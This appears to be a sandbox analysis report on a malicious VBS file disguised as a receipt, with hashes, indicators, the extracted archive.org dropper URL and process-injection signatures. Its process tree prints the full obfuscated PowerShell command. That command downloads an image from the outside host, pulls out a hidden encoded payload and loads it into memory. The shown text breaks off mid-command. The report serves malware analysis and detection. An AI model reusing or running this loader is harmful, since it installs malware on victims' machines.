5882b019b2e198796c8a641a21f12f21886e178d20985c44a155dfe096db036d

General

Target

ico/receipt#295.vbs
Size

526KB
MD5

ed7c0924f17062f0a8529be119ac681f
SHA1

7b2fe31aab29c926aee9917955b63c882565a6a8
SHA256

2be32404db27ff805fc5d7293a7daaf6955613637852580b6bd744d061df28f2
SHA512

6347509f3160134d14a8c1623f0e128845fd413c6e1a0ce3ec3a95117b143ed28cf626fdb2f7f810c1630e24834cc6c3c3b2690f3144c446186169404d443f36
SSDEEP

12288:0KGqe3sjWlECjW5J5fbFFhvFpt05P8eli+tTebpFJr+kCp2Y5m9MoqHzqra/:pKxjgTv90

Score

10^/10

execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

exe.dropper

https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
5	2088	powershell.exe
6	2088	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1864	powershell.exe
2088	powershell.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
1864	powershell.exe
2088	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1864	powershell.exe
Token: SeDebugPrivilege	2088	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2400 wrote to memory of 1864	2400	WScript.exe	28
PID 2400 wrote to memory of 1864	2400	WScript.exe	28
PID 2400 wrote to memory of 1864	2400	WScript.exe	28
PID 1864 wrote to memory of 2088	1864	powershell.exe	30
PID 1864 wrote to memory of 2088	1864	powershell.exe	30
PID 1864 wrote to memory of 2088	1864	powershell.exe	30

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ico\receipt#295.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2400
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J≱ ➲ ᭷ ꒶ ䷯Bp≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBn≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯VQBy≱ ➲ ᭷ ꒶ ䷯Gw≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯9≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯JwBo≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bw≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯Og≱ ➲ ᭷ ꒶ ䷯v≱ ➲ ᭷ ꒶ ䷯C8≱ ➲ ᭷ ꒶ ䷯aQBh≱ ➲ ᭷ ꒶ ䷯DY≱ ➲ ᭷ ꒶ ䷯M≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯x≱ ➲ ᭷ ꒶ ䷯Dc≱ ➲ ᭷ ꒶ ䷯M≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯2≱ ➲ ᭷ ꒶ ䷯C4≱ ➲ ᭷ ꒶ ䷯dQBz≱ ➲ ᭷ ꒶ ䷯C4≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯GM≱ ➲ ᭷ ꒶ ䷯a≱ ➲ ᭷ ꒶ ䷯Bp≱ ➲ ᭷ ꒶ ䷯HY≱ ➲ ᭷ ꒶ ䷯ZQ≱ ➲ ᭷ ꒶ ䷯u≱ ➲ ᭷ ꒶ ䷯G8≱ ➲ ᭷ ꒶ ䷯cgBn≱ ➲ ᭷ ꒶ ䷯C8≱ ➲ ᭷ ꒶ ䷯Mg≱ ➲ ᭷ ꒶ ䷯v≱ ➲ ᭷ ꒶ ䷯Gk≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯cw≱ ➲ ᭷ ꒶ ䷯v≱ ➲ ᭷ ꒶ ䷯G4≱ ➲ ᭷ ꒶ ䷯ZQB3≱ ➲ ᭷ ꒶ ䷯F8≱ ➲ ᭷ ꒶ ䷯aQBt≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯ZwBl≱ ➲ ᭷ ꒶ ䷯F8≱ ➲ ᭷ ꒶ ䷯Mg≱ ➲ ᭷ ꒶ ䷯w≱ ➲ ᭷ ꒶ ䷯DI≱ ➲ ᭷ ꒶ ䷯N≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯w≱ ➲ ᭷ ꒶ ䷯Dk≱ ➲ ᭷ ꒶ ䷯M≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯1≱ ➲ ᭷ ꒶ ䷯C8≱ ➲ ᭷ ꒶ ䷯bgBl≱ ➲ ᭷ ꒶ ䷯Hc≱ ➲ ᭷ ꒶ ䷯XwBp≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBn≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯LgBq≱ ➲ ᭷ ꒶ ䷯H≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯Zw≱ ➲ ᭷ ꒶ ䷯n≱ ➲ ᭷ ꒶ ䷯Ds≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯B3≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯YgBD≱ ➲ ᭷ ꒶ ䷯Gw≱ ➲ ᭷ ꒶ ䷯aQBl≱ ➲ ᭷ ꒶ ䷯G4≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯D0≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯BO≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯dw≱ ➲ ᭷ ꒶ ䷯t≱ ➲ ᭷ ꒶ ䷯E8≱ ➲ ᭷ ꒶ ䷯YgBq≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯YwB0≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯UwB5≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯LgBO≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯u≱ ➲ ᭷ ꒶ ䷯Fc≱ ➲ ᭷ ꒶ ䷯ZQBi≱ ➲ ᭷ ꒶ ䷯EM≱ ➲ ᭷ ꒶ ䷯b≱ ➲ ᭷ ꒶ ䷯Bp≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯bgB0≱ ➲ ᭷ ꒶ ䷯Ds≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bp≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBn≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯QgB5≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯ZQBz≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯PQ≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯CQ≱ ➲ ᭷ ꒶ ䷯dwBl≱ ➲ ᭷ ꒶ ䷯GI≱ ➲ ᭷ ꒶ ䷯QwBs≱ ➲ ᭷ ꒶ ䷯Gk≱ ➲ ᭷ ꒶ ䷯ZQBu≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯LgBE≱ ➲ ᭷ ꒶ ䷯G8≱ ➲ ᭷ ꒶ ䷯dwBu≱ ➲ ᭷ ꒶ ䷯Gw≱ ➲ ᭷ ꒶ ䷯bwBh≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯R≱ ➲ ᭷ ꒶ ䷯Bh≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQ≱ ➲ ᭷ ꒶ ䷯o≱ ➲ ᭷ ꒶ ䷯CQ≱ ➲ ᭷ ꒶ ䷯aQBt≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯ZwBl≱ ➲ ᭷ ꒶ ䷯FU≱ ➲ ᭷ ꒶ ䷯cgBs≱ ➲ ᭷ ꒶ ䷯Ck≱ ➲ ᭷ ꒶ ䷯Ow≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯Gk≱ ➲ ᭷ ꒶ ䷯bQBh≱ ➲ ᭷ ꒶ ䷯Gc≱ ➲ ᭷ ꒶ ䷯ZQBU≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯e≱ ➲ ᭷ ꒶ ䷯B0≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯PQ≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯Fs≱ ➲ ᭷ ꒶ ䷯UwB5≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯LgBU≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯e≱ ➲ ᭷ ꒶ ䷯B0≱ ➲ ᭷ ꒶ ䷯C4≱ ➲ ᭷ ꒶ ䷯RQBu≱ ➲ ᭷ ꒶ ䷯GM≱ ➲ ᭷ ꒶ ䷯bwBk≱ ➲ ᭷ ꒶ ䷯Gk≱ ➲ ᭷ ꒶ ䷯bgBn≱ ➲ ᭷ ꒶ ䷯F0≱ ➲ ᭷ ꒶ ䷯Og≱ ➲ ᭷ ꒶ ䷯6≱ ➲ ᭷ ꒶ ䷯FU≱ ➲ ᭷ ꒶ ䷯V≱ ➲ ᭷ ꒶ ䷯BG≱ ➲ ᭷ ꒶ ䷯Dg≱ ➲ ᭷ ꒶ ䷯LgBH≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯BT≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯cgBp≱ ➲ ᭷ ꒶ ䷯G4≱ ➲ ᭷ ꒶ ䷯Zw≱ ➲ ᭷ ꒶ ䷯o≱ ➲ ᭷ ꒶ ䷯CQ≱ ➲ ᭷ ꒶ ䷯aQBt≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯ZwBl≱ ➲ ᭷ ꒶ ䷯EI≱ ➲ ᭷ ꒶ ䷯eQB0≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯cw≱ ➲ ᭷ ꒶ ䷯p≱ ➲ ᭷ ꒶ ䷯Ds≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bz≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯RgBs≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯Zw≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯D0≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯n≱ ➲ ᭷ ꒶ ䷯Dw≱ ➲ ᭷ ꒶ ䷯P≱ ➲ ᭷ ꒶ ䷯BC≱ ➲ ᭷ ꒶ ䷯EE≱ ➲ ᭷ ꒶ ䷯UwBF≱ ➲ ᭷ ꒶ ䷯DY≱ ➲ ᭷ ꒶ ䷯N≱ ➲ ᭷ ꒶ ䷯Bf≱ ➲ ᭷ ꒶ ䷯FM≱ ➲ ᭷ ꒶ ䷯V≱ ➲ ᭷ ꒶ ䷯BB≱ ➲ ᭷ ꒶ ䷯FI≱ ➲ ᭷ ꒶ ䷯V≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯+≱ ➲ ᭷ ꒶ ䷯D4≱ ➲ ᭷ ꒶ ䷯Jw≱ ➲ ᭷ ꒶ ䷯7≱ ➲ ᭷ ꒶ ䷯CQ≱ ➲ ᭷ ꒶ ䷯ZQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯RgBs≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯Zw≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯D0≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯n≱ ➲ ᭷ ꒶ ䷯Dw≱ ➲ ᭷ ꒶ ䷯P≱ ➲ ᭷ ꒶ ䷯BC≱ ➲ ᭷ ꒶ ䷯EE≱ ➲ ᭷ ꒶ ䷯UwBF≱ ➲ ᭷ ꒶ ䷯DY≱ ➲ ᭷ ꒶ ䷯N≱ ➲ ᭷ ꒶ ䷯Bf≱ ➲ ᭷ ꒶ ䷯EU≱ ➲ ᭷ ꒶ ䷯TgBE≱ ➲ ᭷ ꒶ ䷯D4≱ ➲ ᭷ ꒶ ䷯Pg≱ ➲ ᭷ ꒶ ䷯n≱ ➲ ᭷ ꒶ ䷯Ds≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bz≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯SQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯ZQB4≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯PQ≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯CQ≱ ➲ ᭷ ꒶ ䷯aQBt≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯ZwBl≱ ➲ ᭷ ꒶ ䷯FQ≱ ➲ ᭷ ꒶ ䷯ZQB4≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯LgBJ≱ ➲ ᭷ ꒶ ䷯G4≱ ➲ ᭷ ꒶ ䷯Z≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯Hg≱ ➲ ᭷ ꒶ ䷯TwBm≱ ➲ ᭷ ꒶ ䷯Cg≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bz≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯RgBs≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯Zw≱ ➲ ᭷ ꒶ ䷯p≱ ➲ ᭷ ꒶ ䷯Ds≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯G4≱ ➲ ᭷ ꒶ ䷯Z≱ ➲ ᭷ ꒶ ䷯BJ≱ ➲ ᭷ ꒶ ䷯G4≱ ➲ ᭷ ꒶ ䷯Z≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯Hg≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯9≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bp≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBn≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯V≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯Hg≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯u≱ ➲ ᭷ ꒶ ䷯Ek≱ ➲ ᭷ ꒶ ䷯bgBk≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯e≱ ➲ ᭷ ꒶ ䷯BP≱ ➲ ᭷ ꒶ ䷯GY≱ ➲ ᭷ ꒶ ䷯K≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯bgBk≱ ➲ ᭷ ꒶ ䷯EY≱ ➲ ᭷ ꒶ ䷯b≱ ➲ ᭷ ꒶ ䷯Bh≱ ➲ ᭷ ꒶ ䷯Gc≱ ➲ ᭷ ꒶ ䷯KQ≱ ➲ ᭷ ꒶ ䷯7≱ ➲ ᭷ ꒶ ䷯CQ≱ ➲ ᭷ ꒶ ䷯cwB0≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯cgB0≱ ➲ ᭷ ꒶ ䷯Ek≱ ➲ ᭷ ꒶ ䷯bgBk≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯e≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯C0≱ ➲ ᭷ ꒶ ䷯ZwBl≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯M≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯C0≱ ➲ ᭷ ꒶ ䷯YQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯bgBk≱ ➲ ᭷ ꒶ ䷯Ek≱ ➲ ᭷ ꒶ ䷯bgBk≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯e≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯C0≱ ➲ ᭷ ꒶ ䷯ZwB0≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bz≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯SQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯ZQB4≱ ➲ ᭷ ꒶ ䷯Ds≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bz≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯SQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯ZQB4≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯Kw≱ ➲ ᭷ ꒶ ䷯9≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bz≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯RgBs≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯Zw≱ ➲ ᭷ ꒶ ䷯u≱ ➲ ᭷ ꒶ ䷯Ew≱ ➲ ᭷ ꒶ ䷯ZQBu≱ ➲ ᭷ ꒶ ䷯Gc≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bo≱ ➲ ᭷ ꒶ ䷯Ds≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bi≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯cwBl≱ ➲ ᭷ ꒶ ䷯DY≱ ➲ ᭷ ꒶ ䷯N≱ ➲ ᭷ ꒶ ䷯BM≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯bgBn≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯a≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯D0≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯bgBk≱ ➲ ᭷ ꒶ ䷯Ek≱ ➲ ᭷ ꒶ ䷯bgBk≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯e≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯C0≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bh≱ ➲ ᭷ ꒶ ䷯HI≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯BJ≱ ➲ ᭷ ꒶ ䷯G4≱ ➲ ᭷ ꒶ ䷯Z≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯Hg≱ ➲ ᭷ ꒶ ䷯Ow≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯GI≱ ➲ ᭷ ꒶ ䷯YQBz≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯Ng≱ ➲ ᭷ ꒶ ䷯0≱ ➲ ᭷ ꒶ ䷯EM≱ ➲ ᭷ ꒶ ䷯bwBt≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯9≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bp≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBn≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯V≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯Hg≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯u≱ ➲ ᭷ ꒶ ䷯FM≱ ➲ ᭷ ꒶ ䷯dQBi≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯By≱ ➲ ᭷ ꒶ ䷯Gk≱ ➲ ᭷ ꒶ ䷯bgBn≱ ➲ ᭷ ꒶ ䷯Cg≱ ➲ ᭷ ꒶ ䷯J≱ ➲ ᭷ ꒶ ䷯Bz≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯YQBy≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯SQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯ZQB4≱ ➲ ᭷ ꒶ ䷯Cw≱ ➲ ᭷ ꒶ ䷯I≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯GI≱ ➲ ᭷ ꒶ ䷯YQBz≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯Ng≱ ➲ ᭷ ꒶ ䷯0≱ ➲ ᭷ ꒶ ䷯Ew≱ ➲ ᭷ ꒶ ䷯ZQBu≱ ➲ ᭷ ꒶ ䷯Gc≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bo≱ ➲ ᭷ ꒶ ䷯Ck≱ ➲ ᭷ ꒶ ䷯Ow≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯GM≱ ➲ ᭷ ꒶ ䷯bwBt≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯QgB5≱ ➲ ᭷ ꒶ ䷯HQ≱ ➲ ᭷ ꒶ ䷯ZQBz≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯PQ≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯Fs≱ ➲ ᭷ ꒶ ䷯UwB5≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯LgBD≱ ➲ ᭷ ꒶ ䷯G8≱ ➲ ᭷ ꒶ ䷯bgB2≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯cgB0≱ ➲ ᭷ ꒶ ䷯F0≱ ➲ ᭷ ꒶ ䷯Og≱ ➲ ᭷ ꒶ ䷯6≱ ➲ ᭷ ꒶ ䷯EY≱ ➲ ᭷ ꒶ ䷯cgBv≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯QgBh≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯ZQ≱ ➲ ᭷ ꒶ ䷯2≱ ➲ ᭷ ꒶ ䷯DQ≱ ➲ ᭷ ꒶ ䷯UwB0≱ ➲ ᭷ ꒶ ䷯HI≱ ➲ ᭷ ꒶ ䷯aQBu≱ ➲ ᭷ ꒶ ䷯Gc≱ ➲ ᭷ ꒶ ䷯K≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯k≱ ➲ ᭷ ꒶ ䷯GI≱ ➲ ᭷ ꒶ ䷯YQBz≱ ➲ ᭷ ꒶ ䷯GU≱ ➲ ᭷ ꒶ ䷯Ng≱ ➲ ᭷ ꒶ ䷯0≱ ➲ ᭷ ꒶ ䷯EM≱ ➲ ᭷ ꒶ ䷯bwBt≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯YQBu≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯KQ≱ ➲ ᭷ ꒶ ䷯7≱ ➲ ᭷ ꒶ ䷯CQ≱ ➲ ᭷ ꒶ ䷯b≱ ➲ ᭷ ꒶ ䷯Bv≱ ➲ ᭷ ꒶ ䷯GE≱ ➲ ᭷ ꒶ ䷯Z≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯GQ≱ ➲ ᭷ ꒶ ䷯QQBz≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯ZQBt≱ ➲ ᭷ ꒶ ䷯GI≱ ➲ ᭷ ꒶ ䷯b≱ ➲ ᭷ ꒶ ䷯B5≱ ➲ ᭷ ꒶ ䷯C≱ ➲ ᭷ ꒶ ䷯≱ ➲ ᭷ ꒶ ䷯PQ≱ ➲ ᭷ ꒶ ䷯g≱ ➲ ᭷ ꒶ ䷯Fs≱ ➲ ᭷ ꒶ ䷯UwB5≱ ➲ ᭷ ꒶ ䷯HM≱ ➲ ᭷ ꒶ ䷯d≱ ➲ ᭷ ꒶ ䷯Bl≱ ➲ ᭷ ꒶ ䷯G0≱ ➲ ᭷ ꒶ ䷯LgBS≱ ➲ 